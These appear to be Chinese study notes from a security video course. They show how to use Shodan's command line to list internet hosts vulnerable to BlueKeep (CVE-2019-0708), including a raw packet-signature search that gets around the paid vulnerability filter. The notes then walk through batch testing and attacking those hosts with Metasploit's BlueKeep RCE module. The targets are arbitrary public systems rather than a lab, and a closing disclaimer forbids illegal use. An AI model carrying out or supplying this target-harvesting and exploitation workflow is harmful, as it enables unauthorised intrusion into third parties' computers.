声明:学习视频来自b站up主 泷羽sec,如涉及侵权马上删除文章
感谢泷羽sec 团队 的教学
一、shodan的语法使用
(1)download:将搜索结果下载到一个文件中,文件的每一行都是JSON的格式存储,默认1000条结果,如果下载更多需要增加--limit参数
shodan download -h (查看帮助文档)
shodan download 文件名 --limit 1000 --fields ip_str,port
(2)parse:可以解析之前下载的数据,可以帮助我们过滤自己感兴趣的内容
shodan parse -h (查看帮助文档)
shodan parse --fields ip_str,port ,xxxx.json.gz(压缩后的文件名)
二、查找特定漏洞的目标
例如,我们去查找存在CVE-2019-0708的漏洞的目标
(一)CVE-2019-0708的简介
CVE-2019-0708 是一个严重的安全漏洞。
1、漏洞概述
它是微软远程桌面服务(Remote Desktop Services)中的一个远程代码执行漏洞,也被称为 "BlueKeep" 漏洞。该漏洞影响了多个版本的 Windows 操作系统,包括 Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP 和 Windows 2000。
2、漏洞危害
攻击者可以利用此漏洞在未授权的情况下远程执行代码,从而完全控制受影响的系统。这可能导致敏感信息泄露、系统被用于恶意目的(如发起分布式拒绝服务攻击、作为僵尸网络的一部分等)或者进一步渗透到企业网络内部。
3、漏洞利用方式
攻击者通过向存在漏洞的远程桌面服务发送精心构造的恶意数据包来触发漏洞。由于该漏洞可以在无需用户交互的情况下被利用,因此潜在的风险非常高。
(二)使用命令行查找
1、shodan search --limit 1000 --fields ip_str port vuln="CVE-2019-0708"
注意:vuln功能需要付费开通,普通的终身会员是无法使用的
2、shodan search --limit 1000 --fields ip_str port "\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
使用CVE-2019-0708的漏洞特征进行筛选,实现绕过,成功查询到拥有该漏洞的目标
三、实现批量漏洞验证
使用 msfconsole 可以实现批量验证漏洞
1、首先,我们将前面收集的存在漏洞的目标IP存储在一个TXT文件,名为0708
2、然后,在msfconsole中 输入:search 0708
3、use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 输入命令,进入脚本执行
4、然后输入:show options,查看选项
5、输入 set rhosts file:文件路径 ,回车执行
6、check 检测文件内IP的漏洞利用情况
7、如果攻击不成功,首先 show options查看我们的payload 的IP端口要填对,另外一个就是show targets ,将targets设置正确
免责声明
再次声明,本篇文章仅是记录个人的学习笔记,方便大家交流学习。禁止用户将其用于任何非法或恶意的活动,包括但不限于未经授权的访问、网络攻击、侵犯隐私等行为。使用 Shodan 的用户必须遵守所有适用的法律法规,包括但不限于与计算机犯罪、隐私保护、知识产权保护等相关的法律。如果违反法律规定,使用者将承担相应的法律责任,一切与本人无关